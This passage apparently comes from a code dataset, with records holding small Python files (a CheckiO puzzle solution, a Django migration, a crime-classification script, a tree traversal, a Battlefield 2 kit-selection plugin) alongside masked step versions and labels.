twit.statuses.update(status=tweet)\n\t\t\t print tweet\n except:\n pass\n\n # tweet if down speed is less than whatever I set\n elif eval(d)<min_net_speed:\n print \"trying to tweet\"\n try:\n # i know there must be a better way than to do (str(int(eval())))\n tweet=\"Hey @Comcast why is my internet speed \" + str(int(eval(d))) + \"down\\\\\" + str(int(eval(u))) + \"up when I pay for 150down\\\\10up in Washington DC? @ComcastCares @xfinity #comcast #speedtest\"\n ## twit.statuses.update(status=tweet)\n\t\t\t print tweet\n except Exception,e:\n print str(e)\n pass\n return\n\nif __name__ == '__main__':\n test()\n print 'completed'\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
#Answer to The Ship Teams - https://py.checkio.org/en/mission/the-ship-teams/
def two_teams(sailors):
result = [] #To store the result
temp = [[],[]] #To store the intermediatary values
for i in sailors.items(): #To get the values of dictionary as Tuple
if i[1] > 40 or i[1] < 20: #To get the people to be added to the First Ship
temp[0].append(i[0]) #Adding each person name to first Temp List
else: #To get the people to be added to the Second Ship
temp[1].append(i[0]) #Adding each person name to second Temp List
result.append(sorted(temp[0])) #Adding all the names of the Ship 1 to resultant
result.append(sorted(temp[1])) #Adding all the names of the Ship 2 to resultant
return result #Return the result
if __name__ == '__main__':
print("Example:")
print(two_teams({'Smith': 34, 'Wesson': 22, 'Coleman': 45, 'Abrahams': 19}))
print(two_teams({'Fernandes': 18, 'Johnson': 22, 'Kale': 41, 'McCortney': 54}))
#These "asserts" using only for self-checking and not necessary for auto-testing
assert two_teams({
'Smith': 34,
'Wesson': 22,
'Coleman': 45,
'Abrahams': 19}) == [
['Abrahams', 'Coleman'],
['Smith', 'Wesson']
]
assert two_teams({
'Fernandes': 18,
'Johnson': 22,
'Kale': 41,
'McCortney': 54}) == [
['Fernandes', 'Kale', 'McCortney'],
['Johnson']
]
print("Coding complete? Click 'Check' to earn cool rewards!")
|
normal
|
{
"blob_id": "de634c95fddf4591cb15cd0eb20e798043075798",
"index": 2464,
"step-1": "<mask token>\n",
"step-2": "def two_teams(sailors):\n result = []\n temp = [[], []]\n for i in sailors.items():\n if i[1] > 40 or i[1] < 20:\n temp[0].append(i[0])\n else:\n temp[1].append(i[0])\n result.append(sorted(temp[0]))\n result.append(sorted(temp[1]))\n return result\n\n\n<mask token>\n",
"step-3": "def two_teams(sailors):\n result = []\n temp = [[], []]\n for i in sailors.items():\n if i[1] > 40 or i[1] < 20:\n temp[0].append(i[0])\n else:\n temp[1].append(i[0])\n result.append(sorted(temp[0]))\n result.append(sorted(temp[1]))\n return result\n\n\nif __name__ == '__main__':\n print('Example:')\n print(two_teams({'Smith': 34, 'Wesson': 22, 'Coleman': 45, 'Abrahams': 19})\n )\n print(two_teams({'Fernandes': 18, 'Johnson': 22, 'Kale': 41,\n 'McCortney': 54}))\n assert two_teams({'Smith': 34, 'Wesson': 22, 'Coleman': 45, 'Abrahams': 19}\n ) == [['Abrahams', 'Coleman'], ['Smith', 'Wesson']]\n assert two_teams({'Fernandes': 18, 'Johnson': 22, 'Kale': 41,\n 'McCortney': 54}) == [['Fernandes', 'Kale', 'McCortney'], ['Johnson']]\n print(\"Coding complete? Click 'Check' to earn cool rewards!\")\n",
"step-4": "#Answer to The Ship Teams - https://py.checkio.org/en/mission/the-ship-teams/\n\ndef two_teams(sailors):\n result = [] #To store the result\n temp = [[],[]] #To store the intermediatary values\n for i in sailors.items(): #To get the values of dictionary as Tuple\n if i[1] > 40 or i[1] < 20: #To get the people to be added to the First Ship\n temp[0].append(i[0]) #Adding each person name to first Temp List\n else: #To get the people to be added to the Second Ship\n temp[1].append(i[0]) #Adding each person name to second Temp List\n result.append(sorted(temp[0])) #Adding all the names of the Ship 1 to resultant\n result.append(sorted(temp[1])) #Adding all the names of the Ship 2 to resultant\n return result #Return the result\n\nif __name__ == '__main__':\n print(\"Example:\")\n print(two_teams({'Smith': 34, 'Wesson': 22, 'Coleman': 45, 'Abrahams': 19}))\n print(two_teams({'Fernandes': 18, 'Johnson': 22, 'Kale': 41, 'McCortney': 54}))\n\n #These \"asserts\" using only for self-checking and not necessary for auto-testing\n assert two_teams({\n 'Smith': 34, \n 'Wesson': 22, \n 'Coleman': 45, \n 'Abrahams': 19}) == [\n ['Abrahams', 'Coleman'], \n ['Smith', 'Wesson']\n ]\n\n assert two_teams({\n 'Fernandes': 18,\n 'Johnson': 22,\n 'Kale': 41,\n 'McCortney': 54}) == [\n ['Fernandes', 'Kale', 'McCortney'], \n ['Johnson']\n ]\n print(\"Coding complete? Click 'Check' to earn cool rewards!\")",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# Generated by Django 2.2 on 2020-10-26 15:16
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('viajes', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='viajes',
options={'verbose_name': 'Movilización', 'verbose_name_plural': 'Movilización'},
),
]
|
normal
|
{
"blob_id": "760a5a168575a0ea12b93cb58c1e81e313704e35",
"index": 6276,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('viajes', '0001_initial')]\n operations = [migrations.AlterModelOptions(name='viajes', options={\n 'verbose_name': 'Movilización', 'verbose_name_plural': 'Movilización'})\n ]\n",
"step-4": "from django.db import migrations\n\n\nclass Migration(migrations.Migration):\n dependencies = [('viajes', '0001_initial')]\n operations = [migrations.AlterModelOptions(name='viajes', options={\n 'verbose_name': 'Movilización', 'verbose_name_plural': 'Movilización'})\n ]\n",
"step-5": "# Generated by Django 2.2 on 2020-10-26 15:16\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('viajes', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='viajes',\n options={'verbose_name': 'Movilización', 'verbose_name_plural': 'Movilización'},\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import pandas as pd
import time
from datetime import datetime
from sklearn import metrics
from sklearn import cross_validation
from sklearn.multiclass import OneVsRestClassifier
from sklearn.tree import DecisionTreeClassifier, export_graphviz
from sklearn.naive_bayes import MultinomialNB,BernoulliNB,GaussianNB
from sklearn.cross_validation import StratifiedKFold
from sklearn.svm import SVC, LinearSVC
import gzip
def getData():
print "reading file ..."
data=pd.read_csv('../train.csv')
test=pd.read_csv('../test.csv')
return data,test
def preprocessTest(trainDF):
print "pre processing data ..."
start=time.time()
return trainDF
def decisionTree(trainDF,y,xHat):
start=time.time()
print "#"*70
print "Using Decision Tree Classifier"
print "#"*70
trainingVectors=trainDF.as_matrix()
# clf=DecisionTreeClassifier(criterion="entropy")
clf = MultinomialNB()
print "training classifier ..."
clf.fit(trainDF,y)
print "predicting classes for test data"
# xHat.drop(['Id'])
yHat=clf.predict_proba(xHat)
print"yhat"
print yHat[0]
end=time.time()
print "Execution time for classifier: "+str(end-start)
print "#"*70
return yHat,clf
def daytime(x):
# eMorning=0
# morning=0
# afternoon=0
# evening=0
# night=0
a=0
b=0
c=0
d=0
e=0
f=0
# if (x in [4,5,6,7]):
# eMorning=1
# if (x in [8,9,10,11]):
# morning=1
# if (x in [12,13,14,15,16]):
# afternoon=1
# if (x in [17,18,19,20,21,22,23,0,1,2,3]):
# night=1
if (x in [4,5,6,7]):
a=1
if (x in [8,9,10,11]):
b=1
if (x in [12,13,14,15]):
c=1
if (x in [16,17,18,19]):
d=1
if (x in [20,21,22,23]):
e=1
if (x in [0,1,2,3]):
f=1
return a,b,c,d,e,f
def splitDate(x):
dateObject=datetime.strptime(x,"%Y-%m-%d %H:%M:%S")
time=dateObject.hour
day=dateObject.day
month=dateObject.month
year=dateObject.year
return time,day,month,year
def preprocessData(trainDF):
print "pre processing data ..."
start=time.time()
cols=trainDF.columns.values.tolist()
if ('Category'in cols):
trainDF=trainDF.drop(['Category','Descript','Resolution'],axis=1)
df=pd.DataFrame()
print"seperating districts"
df=pd.get_dummies(trainDF['PdDistrict'],prefix='pD')
trainDF=pd.concat([trainDF,df],axis=1)
df=pd.DataFrame()
print "seperating days of week"
df=pd.get_dummies(trainDF['DayOfWeek'],prefix='day')
trainDF=pd.concat([trainDF,df],axis=1)
print "seperating time"
trainDF["time"],trainDF["day"],trainDF["month"],trainDF["year"]=zip(*trainDF["Dates"].apply(splitDate))
print "getting part of day"
trainDF["a"],trainDF["b"],trainDF["c"],trainDF["d"],trainDF["e"],trainDF["f"]=zip(*trainDF["time"].apply(daytime))
print"generating extra feature Awake"
# trainDF["summer"],trainDF["fall"],trainDF["winter"],trainDF["spring"]=zip(*trainDF["month"].apply(getSeason))
print"generating extra feature Awake"
trainDF["Awake"]=trainDF["time"].apply(lambda x: 1 if (x==0 or (x>=8 and x<=23)) else 0)
print"generating extra feature intersection"
trainDF['intersection']=trainDF['Address'].apply(lambda x: 1 if "/" in x else 0)
print "descretizing X"
xcol={}
trainDF.X=pd.cut(trainDF.X,60)
temp=sorted(trainDF.X.unique())
for i in temp:
xcol[i]=temp.index(i)
trainDF.X=trainDF.X.map(xcol)
df=pd.DataFrame()
df=pd.get_dummies(trainDF['X'],prefix='X')
trainDF=pd.concat([trainDF,df],axis=1)
print "descretizing Y"
ycol={}
trainDF.Y=pd.cut(trainDF.Y,100)
temp=sorted(trainDF.Y.unique())
for i in temp:
ycol[i]=temp.index(i)
trainDF.Y=trainDF.Y.map(ycol)
df=pd.DataFrame()
df=pd.get_dummies(trainDF['Y'],prefix='Y')
trainDF=pd.concat([trainDF,df],axis=1)
print"dropping unnecessary values"
trainDF=trainDF.drop(['DayOfWeek','PdDistrict','Address','time','day','year','month','Dates','X','Y'],axis=1)
print trainDF.head()
end=time.time()
return trainDF
def main():
trainDF,testDF=getData()
y=trainDF.Category.values
idList=testDF.Id.tolist()
testDF=testDF.drop(['Id'],axis=1)
trainDF=preprocessData(trainDF)
testDF=preprocessData(testDF)
predicted,clf=decisionTree(trainDF,y,testDF)
submission = pd.DataFrame(predicted,columns=clf.classes_)
submission['Id']=idList
cols=submission.columns.tolist()
cols=cols[-1:]+cols[:-1]
submission=submission[cols]
print submission.head()
submission.to_csv(open('RF.csv','wt'),index=False)
print "submission file created"
return
if __name__=="__main__":
main()
|
normal
|
{
"blob_id": "78615f6b020e2547e5d9a08d8b4c414184106bb3",
"index": 6465,
"step-1": "import pandas as pd\r\nimport time\r\nfrom datetime import datetime\r\nfrom sklearn import metrics\r\nfrom sklearn import cross_validation\r\nfrom sklearn.multiclass import OneVsRestClassifier\r\nfrom sklearn.tree import DecisionTreeClassifier, export_graphviz\r\nfrom sklearn.naive_bayes import MultinomialNB,BernoulliNB,GaussianNB\r\nfrom sklearn.cross_validation import StratifiedKFold\r\nfrom sklearn.svm import SVC, LinearSVC\r\nimport gzip\r\n\r\ndef getData():\r\n print \"reading file ...\"\r\n data=pd.read_csv('../train.csv')\r\n test=pd.read_csv('../test.csv')\r\n return data,test\r\n\r\ndef preprocessTest(trainDF):\r\n\tprint \"pre processing data ...\"\r\n \tstart=time.time()\r\n\treturn trainDF\r\n\r\ndef decisionTree(trainDF,y,xHat):\r\n start=time.time()\r\n print \"#\"*70\r\n print \"Using Decision Tree Classifier\"\r\n print \"#\"*70\r\n trainingVectors=trainDF.as_matrix()\r\n # clf=DecisionTreeClassifier(criterion=\"entropy\")\r\n clf = MultinomialNB()\r\n print \"training classifier ...\"\r\n clf.fit(trainDF,y)\r\n print \"predicting classes for test data\"\r\n # xHat.drop(['Id'])\r\n yHat=clf.predict_proba(xHat)\r\n print\"yhat\"\r\n print yHat[0]\r\n end=time.time()\r\n print \"Execution time for classifier: \"+str(end-start)\r\n print \"#\"*70\r\n return yHat,clf\r\n\r\n\r\ndef daytime(x):\r\n # eMorning=0\r\n # morning=0\r\n # afternoon=0\r\n # evening=0\r\n # night=0\r\n a=0\r\n b=0\r\n c=0\r\n d=0\r\n e=0\r\n f=0\r\n # if (x in [4,5,6,7]):\r\n # eMorning=1\r\n # if (x in [8,9,10,11]):\r\n # morning=1\r\n # if (x in [12,13,14,15,16]):\r\n # afternoon=1\r\n # if (x in [17,18,19,20,21,22,23,0,1,2,3]):\r\n # night=1\r\n if (x in [4,5,6,7]):\r\n a=1\r\n if (x in [8,9,10,11]):\r\n b=1\r\n if (x in [12,13,14,15]):\r\n c=1\r\n if (x in [16,17,18,19]):\r\n d=1\r\n if (x in [20,21,22,23]):\r\n e=1\r\n if (x in [0,1,2,3]):\r\n f=1\r\n return a,b,c,d,e,f\r\n\r\ndef splitDate(x):\r\n dateObject=datetime.strptime(x,\"%Y-%m-%d %H:%M:%S\")\r\n time=dateObject.hour\r\n day=dateObject.day\r\n month=dateObject.month\r\n year=dateObject.year\r\n return time,day,month,year\r\n\r\ndef preprocessData(trainDF):\r\n print \"pre processing data ...\"\r\n start=time.time()\r\n cols=trainDF.columns.values.tolist()\r\n if ('Category'in cols):\r\n \ttrainDF=trainDF.drop(['Category','Descript','Resolution'],axis=1)\r\n df=pd.DataFrame()\r\n print\"seperating districts\"\r\n df=pd.get_dummies(trainDF['PdDistrict'],prefix='pD')\r\n trainDF=pd.concat([trainDF,df],axis=1)\r\n df=pd.DataFrame()\r\n print \"seperating days of week\"\r\n df=pd.get_dummies(trainDF['DayOfWeek'],prefix='day')\r\n trainDF=pd.concat([trainDF,df],axis=1)\r\n print \"seperating time\"\r\n trainDF[\"time\"],trainDF[\"day\"],trainDF[\"month\"],trainDF[\"year\"]=zip(*trainDF[\"Dates\"].apply(splitDate))\r\n print \"getting part of day\"\r\n trainDF[\"a\"],trainDF[\"b\"],trainDF[\"c\"],trainDF[\"d\"],trainDF[\"e\"],trainDF[\"f\"]=zip(*trainDF[\"time\"].apply(daytime))\r\n print\"generating extra feature Awake\"\r\n # trainDF[\"summer\"],trainDF[\"fall\"],trainDF[\"winter\"],trainDF[\"spring\"]=zip(*trainDF[\"month\"].apply(getSeason))\r\n print\"generating extra feature Awake\"\r\n trainDF[\"Awake\"]=trainDF[\"time\"].apply(lambda x: 1 if (x==0 or (x>=8 and x<=23)) else 0)\r\n print\"generating extra feature intersection\"\r\n trainDF['intersection']=trainDF['Address'].apply(lambda x: 1 if \"/\" in x else 0)\r\n\r\n print \"descretizing X\"\r\n xcol={}\r\n trainDF.X=pd.cut(trainDF.X,60)\r\n temp=sorted(trainDF.X.unique())\r\n for i in temp:\r\n xcol[i]=temp.index(i)\r\n trainDF.X=trainDF.X.map(xcol)\r\n df=pd.DataFrame()\r\n df=pd.get_dummies(trainDF['X'],prefix='X')\r\n trainDF=pd.concat([trainDF,df],axis=1)\r\n\r\n print \"descretizing Y\"\r\n ycol={}\r\n trainDF.Y=pd.cut(trainDF.Y,100)\r\n temp=sorted(trainDF.Y.unique())\r\n for i in temp:\r\n ycol[i]=temp.index(i)\r\n trainDF.Y=trainDF.Y.map(ycol)\r\n df=pd.DataFrame()\r\n df=pd.get_dummies(trainDF['Y'],prefix='Y')\r\n trainDF=pd.concat([trainDF,df],axis=1)\r\n\r\n print\"dropping unnecessary values\"\r\n trainDF=trainDF.drop(['DayOfWeek','PdDistrict','Address','time','day','year','month','Dates','X','Y'],axis=1)\r\n print trainDF.head()\r\n end=time.time()\r\n return trainDF\r\n\r\ndef main():\r\n trainDF,testDF=getData()\r\n y=trainDF.Category.values\r\n idList=testDF.Id.tolist()\r\n testDF=testDF.drop(['Id'],axis=1)\r\n trainDF=preprocessData(trainDF)\r\n testDF=preprocessData(testDF)\r\n predicted,clf=decisionTree(trainDF,y,testDF)\r\n submission = pd.DataFrame(predicted,columns=clf.classes_)\r\n submission['Id']=idList\r\n cols=submission.columns.tolist()\r\n cols=cols[-1:]+cols[:-1]\r\n submission=submission[cols]\r\n print submission.head()\r\n submission.to_csv(open('RF.csv','wt'),index=False)\r\n print \"submission file created\"\r\n return\r\n\r\n\r\nif __name__==\"__main__\":\r\n main()",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
#! /usr/bin/env python
def get_case(str_arg):
first_life_and_work(str_arg)
print('small_hand')
def first_life_and_work(str_arg):
print(str_arg)
if __name__ == '__main__':
get_case('thing')
|
normal
|
{
"blob_id": "7a2ac3a3a2bbd7349e8cc62b4d357394d9600cc8",
"index": 6326,
"step-1": "<mask token>\n",
"step-2": "def get_case(str_arg):\n first_life_and_work(str_arg)\n print('small_hand')\n\n\n<mask token>\n",
"step-3": "def get_case(str_arg):\n first_life_and_work(str_arg)\n print('small_hand')\n\n\ndef first_life_and_work(str_arg):\n print(str_arg)\n\n\n<mask token>\n",
"step-4": "def get_case(str_arg):\n first_life_and_work(str_arg)\n print('small_hand')\n\n\ndef first_life_and_work(str_arg):\n print(str_arg)\n\n\nif __name__ == '__main__':\n get_case('thing')\n",
"step-5": "\n#! /usr/bin/env python\n\ndef get_case(str_arg):\n first_life_and_work(str_arg)\n print('small_hand')\n\ndef first_life_and_work(str_arg):\n print(str_arg)\n\nif __name__ == '__main__':\n get_case('thing')\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
class Solution:
def levelOrder(self, root):
if root is None:
return []
currentList = [root]
nextList = []
solution = []
while currentList:
thisLevel = [node.val for node in currentList]
solution.append(thisLevel)
for node in currentList:
if node.left is not None:
nextList.append(node.left)
if node.right is not None:
nextList.append(node.right)
currentList, nextList = nextList, currentList
del nextList[:]
return solution
|
normal
|
{
"blob_id": "d9f176262dcaf055414fbc43b476117250249b63",
"index": 4696,
"step-1": "<mask token>\n",
"step-2": "class Solution:\n <mask token>\n",
"step-3": "class Solution:\n\n def levelOrder(self, root):\n if root is None:\n return []\n currentList = [root]\n nextList = []\n solution = []\n while currentList:\n thisLevel = [node.val for node in currentList]\n solution.append(thisLevel)\n for node in currentList:\n if node.left is not None:\n nextList.append(node.left)\n if node.right is not None:\n nextList.append(node.right)\n currentList, nextList = nextList, currentList\n del nextList[:]\n return solution\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
# -*- coding: iso-8859-15 -*-
# @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
# @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@8:........C@@@
# @@@@@@@@@@@@@@88@@@@@@@@@@@@@@@@@@@@@@88@@@@@@@@@@888@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@O:...........:C@
# @ .@O O@8 C@@O o@@@: cO oc 8o .@@. @c....:O@@:....:@
# @ .:c8 CO O8 :o O8 oO C@. :8. :::. ..::. ::Cc ..:8o o@: @o....:8@@:....:@
# @ c@@@O OO C8 c@ OO o8 c@. :@. :@@C O@@@@. :@@@c 8@@@@@@@@@@@@: @@@@@@@@@O.....:@
# @ ..oO OO C8 .@O o@@@@@@@. :@. :@@C O@@@@. :@@@c :C8@@@o O@@ccC @@@@@@@O.......c@
# @ oO OO C8 C@O o. c8. :@. :@@8OOCo8@@@@. :@@@8@@@@@@O@@@@@@@8C: @@@@@C.......o@@@
# @ c@@@O OO C8 c8 OO oO c@. :@. o@@@@@@@@@@@@@@@@@@@@@o 8@@@o ..o @@@C......:C@@@@@
# @ c@@@O CO C8 c8 OO o@. c@. :@..o8@@@@@@@@@@@@@@@@Oc@@@c 8@@@o oo @C......:O@@@@@@@
# @ c@@@@ .. 88 c8 O@. .: c@c :o@@@@@@@@@@@@@@@@@@@@@@@@Ooc:: Co o@. @c....:O@@@@@@@@@
# @ c@@@@@o o@@8 c@ O@@o cc c@@O. c@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@: Co o@O @c....:O8@@@@@@@@
# @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@:C@:C:..:C.:.:c.:.@o.............:@
# @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@.:o o.oo o ooCc.oC@c.............:@
# @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
#
# NCOrifle.py -- Support for squadleaders being able to choose between smg and rifle.
#
# ©2010 Spit for Forgotten Hope
import host, bf2
from game.gameplayPlugin import base
from game.utilities import rconExec, getCurrentRound
from NCOrifleData import NCO_kits
DEBUG = 0
class NCOrifle(base):
def round_start(self, hooker):
self.watched_players = []
self.choices = {}
self.spawned = []
self.spawned_dict = {}
if not hooker.hasHook('RemoteCommand', self.onRemoteCommand):
hooker.register('RemoteCommand', self.onRemoteCommand)
hooker.register('PlayerSpawn', self.onPlayerSpawn)
hooker.register('PickupKit', self.onPickupKit)
if DEBUG: print 'NCOrifle: hooks registered'
else:
if DEBUG: print 'NCOrifle: hooks already registered'
def onRemoteCommand(self, playerid, cmd):
if not (cmd == 'ncosmg' or cmd == 'ncorifle' or cmd.startswith('selectkit')): return
if playerid == -1: playerid = 255
player = bf2.playerManager.getPlayerByIndex(playerid)
if DEBUG: print 'NCOrifle: player %s executed rcon command "%s"' % (player.getName(), cmd)
if cmd.startswith('selectkit'):
if cmd.endswith('6'):
self.addPlayer(player)
else:
self.removePlayer(player)
if cmd == 'ncorifle':
self.choices[player] = 'rifle'
if DEBUG: print 'NCOrifle: player %s has chosen a rifle to spawn with' % player.getName()
elif cmd == 'ncosmg':
self.choices[player] = 'smg'
if DEBUG: print 'NCOrifle: player %s has chosen an smg to spawn with' % player.getName()
def onPickupKit(self, player, kit):
if player not in self.spawned: return
def_kit = self.getData(player)
if def_kit is None: return
if DEBUG: print 'Setting NCO kit back to default for team %d' % player.getTeam()
self.setKit(def_kit, player.getTeam(), self.spawned_dict[player])
self.spawned.remove(player)
self.spawned_dict[player] = None
def onPlayerSpawn(self, player, soldier):
try:
self._onPlayerSpawn(player, soldier)
except Exception, e:
print 'NCOrifle exception', e
def getData(self, player):
map, gamemode, size = getCurrentRound()
if map in NCO_kits.keys():
def_kit1, def_kit2 = NCO_kits[map]
exec('def_kit = def_kit%d' % player.getTeam())
return def_kit
else:
print 'NCOrifle: Can\'t find NCO kit info for map %s. Update NCOrifleData.py or provide custom map info via mapdata.py' % map
return None
def _onPlayerSpawn(self, player, soldier):
if player not in self.watched_players: return
def_kit = None
def_kit = self.getData(player)
if def_kit is None: return
if player not in self.choices.keys():
self.setKit(def_kit, player.getTeam(), soldier.templateName)
elif self.choices[player] == 'smg':
self.setKit(def_kit, player.getTeam(), soldier.templateName)
elif self.choices[player] == 'rifle':
if DEBUG: print 'NCOrifle: player %s wants to spawn with a modified NCO kit...' % player.getName()
kit = def_kit + '_rifle'
self.setKit(kit, player.getTeam(), soldier.templateName)
if player in self.spawned: return
self.spawned.append(player)
self.spawned_dict[player] = soldier.templateName
def setKit(self, kit, team, soldier):
rconExec('gameLogic.setKit %d 6 "%s" "%s"' % (team, kit, soldier))
if DEBUG: print 'NCOrifle: Set NCO kit for team %d to %s, %s' % (team, kit, soldier)
def addPlayer(self, player):
if player not in self.watched_players:
self.watched_players.append(player)
if DEBUG: print 'NCOrifle: added player %s to watched players list' % player.getName()
def removePlayer(self, player):
if player in self.watched_players:
self.watched_players.remove(player)
if DEBUG: print 'NCOrifle: removed player %s from watched players list' % player.getName()
|
normal
|
{
"blob_id": "f105ecb8229020554930bb4f0e00ecf88e83f5ae",
"index": 4288,
"step-1": "# -*- coding: iso-8859-15 -*-\r\n# @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\r\n# @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@8:........C@@@\r\n# @@@@@@@@@@@@@@88@@@@@@@@@@@@@@@@@@@@@@88@@@@@@@@@@888@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@O:...........:C@\r\n# @ .@O O@8 C@@O o@@@: cO oc 8o .@@. @c....:O@@:....:@\r\n# @ .:c8 CO O8 :o O8 oO C@. :8. :::. ..::. ::Cc ..:8o o@: @o....:8@@:....:@\r\n# @ c@@@O OO C8 c@ OO o8 c@. :@. :@@C O@@@@. :@@@c 8@@@@@@@@@@@@: @@@@@@@@@O.....:@\r\n# @ ..oO OO C8 .@O o@@@@@@@. :@. :@@C O@@@@. :@@@c :C8@@@o O@@ccC @@@@@@@O.......c@\r\n# @ oO OO C8 C@O o. c8. :@. :@@8OOCo8@@@@. :@@@8@@@@@@O@@@@@@@8C: @@@@@C.......o@@@\r\n# @ c@@@O OO C8 c8 OO oO c@. :@. o@@@@@@@@@@@@@@@@@@@@@o 8@@@o ..o @@@C......:C@@@@@\r\n# @ c@@@O CO C8 c8 OO o@. c@. :@..o8@@@@@@@@@@@@@@@@Oc@@@c 8@@@o oo @C......:O@@@@@@@\r\n# @ c@@@@ .. 88 c8 O@. .: c@c :o@@@@@@@@@@@@@@@@@@@@@@@@Ooc:: Co o@. @c....:O@@@@@@@@@\r\n# @ c@@@@@o o@@8 c@ O@@o cc c@@O. c@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@: Co o@O @c....:O8@@@@@@@@\r\n# @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@:C@:C:..:C.:.:c.:.@o.............:@\r\n# @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@.:o o.oo o ooCc.oC@c.............:@\r\n# @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\r\n#\r\n# NCOrifle.py -- Support for squadleaders being able to choose between smg and rifle.\r\n#\r\n# ©2010 Spit for Forgotten Hope\r\n\r\nimport host, bf2\r\nfrom game.gameplayPlugin import base\r\nfrom game.utilities import rconExec, getCurrentRound\r\nfrom NCOrifleData import NCO_kits\r\n\r\nDEBUG = 0\r\n\r\nclass NCOrifle(base):\r\n def round_start(self, hooker):\r\n self.watched_players = []\r\n self.choices = {}\r\n self.spawned = []\r\n self.spawned_dict = {}\r\n \r\n if not hooker.hasHook('RemoteCommand', self.onRemoteCommand):\r\n hooker.register('RemoteCommand', self.onRemoteCommand)\r\n hooker.register('PlayerSpawn', self.onPlayerSpawn)\r\n hooker.register('PickupKit', self.onPickupKit)\r\n if DEBUG: print 'NCOrifle: hooks registered'\r\n else:\r\n if DEBUG: print 'NCOrifle: hooks already registered'\r\n \r\n def onRemoteCommand(self, playerid, cmd):\r\n if not (cmd == 'ncosmg' or cmd == 'ncorifle' or cmd.startswith('selectkit')): return\r\n if playerid == -1: playerid = 255\r\n player = bf2.playerManager.getPlayerByIndex(playerid)\r\n if DEBUG: print 'NCOrifle: player %s executed rcon command \"%s\"' % (player.getName(), cmd)\r\n \r\n if cmd.startswith('selectkit'):\r\n if cmd.endswith('6'):\r\n self.addPlayer(player)\r\n else:\r\n self.removePlayer(player)\r\n \r\n if cmd == 'ncorifle':\r\n self.choices[player] = 'rifle'\r\n if DEBUG: print 'NCOrifle: player %s has chosen a rifle to spawn with' % player.getName() \r\n elif cmd == 'ncosmg':\r\n self.choices[player] = 'smg'\r\n if DEBUG: print 'NCOrifle: player %s has chosen an smg to spawn with' % player.getName()\r\n \r\n def onPickupKit(self, player, kit):\r\n if player not in self.spawned: return\r\n def_kit = self.getData(player)\r\n if def_kit is None: return\r\n if DEBUG: print 'Setting NCO kit back to default for team %d' % player.getTeam()\r\n self.setKit(def_kit, player.getTeam(), self.spawned_dict[player])\r\n self.spawned.remove(player)\r\n self.spawned_dict[player] = None\r\n \r\n def onPlayerSpawn(self, player, soldier):\r\n try:\r\n self._onPlayerSpawn(player, soldier)\r\n except Exception, e:\r\n print 'NCOrifle exception', e\r\n \r\n def getData(self, player):\r\n map, gamemode, size = getCurrentRound()\r\n if map in NCO_kits.keys():\r\n def_kit1, def_kit2 = NCO_kits[map]\r\n exec('def_kit = def_kit%d' % player.getTeam())\r\n return def_kit\r\n else:\r\n print 'NCOrifle: Can\\'t find NCO kit info for map %s. Update NCOrifleData.py or provide custom map info via mapdata.py' % map\r\n return None\r\n \r\n def _onPlayerSpawn(self, player, soldier):\r\n if player not in self.watched_players: return\r\n def_kit = None\r\n \r\n def_kit = self.getData(player)\r\n \r\n if def_kit is None: return\r\n \r\n if player not in self.choices.keys():\r\n self.setKit(def_kit, player.getTeam(), soldier.templateName)\r\n elif self.choices[player] == 'smg':\r\n self.setKit(def_kit, player.getTeam(), soldier.templateName)\r\n \r\n elif self.choices[player] == 'rifle':\r\n if DEBUG: print 'NCOrifle: player %s wants to spawn with a modified NCO kit...' % player.getName()\r\n kit = def_kit + 